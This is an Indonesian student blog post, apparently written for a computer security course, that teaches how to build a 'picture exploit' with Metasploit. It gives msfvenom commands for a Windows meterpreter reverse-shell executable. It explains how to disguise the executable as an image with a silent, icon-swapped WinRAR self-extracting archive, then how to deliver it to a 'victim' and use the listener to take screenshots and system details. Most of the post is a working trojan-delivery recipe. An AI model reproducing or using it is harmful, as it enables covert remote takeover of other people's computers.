Minggu, 23 Desember 2018

Tutorial Eksploit Gambar dengan Metasploit di Kali Linux (Kelompok Sistem Keamanan Komputer)


M Fari Caesaradha   1715015051
Sholatul Rachmad    1715015053
Akhmad Masyudi     1715015055
Fikri Syifa Maulidin 1715015062
Wahyu Ramadhani    1715015079

TUTORIAL METASPLOIT
Metasploit adalah sebuah aplikasi yang digunakan untuk mengexploitasi kelemahan suatu system ataupun aplikasi. Aplikasi ini bisa untuk penetration testing ke System Windows, Unix/Linux, dan MacOs, tapi yang lebih cenderung Exploitable adalah Windows SP1. Berikut langkah-langkahnya:

1.      Pertama untuk membuat eksploit gambar kita buat dahulu file eksploitnya. Untuk membuatnya kita gunakan perintah msfvenom yang merupakan perintah metasploit untuk membuat payload virus dan men-encode(menyandikan)-nya. Perintahnya seperti berikut
msfvenom –p windows/meterpreter/reverse_tcp LHOST=”ip komputer anda” LPORT=4444 –f exe > “namafile_virus”.exe

Note: untuk mengecek ip komputer, gunakan perintah ifconfig.
Setelah menjalankan perintah diatas file exe akan dibuat di folder HOME, disini saya menamai filenya “masyudi.exe”.

2.       Selanjutnya cari gambar yang kalian ingin jadikan menjadi eksploit dan pindahkan ke folder dimana file virus kalian berada.

3.       Buat juga icon untuk file virusnya dari file gambar tadi. Untuk membuat icon gunakan website https://convertico.co/jpeg-ico/


Note: Mulai dari sini sampai langkah 11 gunakan windows

4.       Lalu pilih file virus dan file gambar dan gabungkan dengan WinRAR



5.       Centang “Create SFX archive”



6.       Pilih tab Advanced, kemudian pilih SFX Options



7.       Di jendala SFX Options pilih tab setup dan masukkan nama file gambar dan file virus yang telah dibuat.



8.       Lalu pilih tab Modes, pada menu “Silent mode” pilih “Hide all”.



9.       Lalu pilih tab “Text and Icon”, pada menu “Load SFX icon” pilih icon yang telah dibuat.


10.   Kemudian klik “OK” dan file akan terbuat.


11.   Lalu pindahkan file yang telah dibuat ke komputer korban
12.   Kembali ke Kali Linux, masuk ke terminal dan ketikkan perintah
msfconsole
untuk masuk ke metasploit dan masukkan perintah berikut
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.11
set LPORT 4444
show option
exploit 





13.   Jika korban sudah menjalankan file maka exploit akan membuka sesi ke komputer korban
14.   Masukkan perintah screenshot untuk mengambil screenshot dari layar korban


15.   Masukkan perintah sysinfo untuk melihat informasi komputer korban.


TERIMA KASIH

0 komentar:

Posting Komentar